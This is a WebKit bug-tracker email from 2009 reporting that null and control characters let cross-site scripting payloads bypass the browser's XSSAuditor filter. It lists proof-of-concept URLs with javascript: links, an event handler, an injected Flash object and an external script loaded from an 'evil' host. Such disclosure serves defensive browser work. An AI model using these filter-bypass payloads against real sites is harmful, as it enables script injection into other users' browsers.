[Webkit-unassigned] [Bug 27151] New: [XSSAuditor] JavaScript URLs with null/control characters bypass XSSAuditor

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Fri Jul 10 11:16:18 PDT 2009


https://bugs.webkit.org/show_bug.cgi?id=27151

           Summary: [XSSAuditor] JavaScript URLs with null/control
                    characters bypass XSSAuditor
           Product: WebKit
           Version: 528+ (Nightly build)
          Platform: All
        OS/Version: All
            Status: UNCONFIRMED
          Severity: Normal
          Priority: P2
         Component: WebCore Misc.
        AssignedTo: webkit-unassigned at lists.webkit.org
        ReportedBy: dbates at berkeley.edu
                CC: sam at webkit.org, abarth at webkit.org, dbates at berkeley.edu


Null/control characters in HTTP GET/POST data can bypass XSSAuditor with
respect to JavaScript URLs.

Examples:

JavaScript URL with Null Character:
http://good.webblaze.org/dbates/xsstest.php?q=%3Ca+href%3Djavascript%3Aal%00ert%28/XSS/%29%3EContinue%3C/a%3E

JavaScript URL with Control Character:
http://good.webblaze.org/dbates/xsstest.php?q=%3Ca+href%3Djavascript%3Aalert%28/XSS%05/%29%3EContinue%3C/a%3E

+++ This bug was initially created as a clone of Bug #27071 +++

Null/control characters in HTTP GET/POST data can bypass XSSAuditor with
respect to injected plugin-based objects, inline event handlers, and external
scripts.

Examples:

Plugin-Injection:
http://good.webblaze.org/dbates/xsstest.php?q=%3Cobject%20classid=%22clsid:d27cdb6e-ae6d-11cf-96b8-444553540000%22%20codebase=%22http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab%22%20id=%22flashMov%22%3E%3Cparam%20name=%22movie%22%20value=%22http://evil.webblaze.org/dbates/execGetURL%05.swf%22%20/%3E%3Cparam%20name=%22allowScriptAccess%22%20value=%22always%22%20/%3E%3Cembed%20src=%22http://evil.webblaze.org/dbates/execGetURL%05.swf%22%20name=%22flashMov%22%20allowScriptAccess=%22always%22%20type=%22application/x-shockwave-flash%22%20/%3E%3C/object%3E

Inline Event Handler:
http://good.webblaze.org/dbates/xsstest.php?q=%3Ca%20href=%22about:blank%22%20onclick=%22al%00ert(5)%22%3Ed%3C/a%3E

External Scripts:
http://good.webblaze.org/dbates/xsstest.php?q=<script
src='http://evil.webblaze.org/dbates/xss.js'></script>

-- 
Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.



More information about the webkit-unassigned mailing list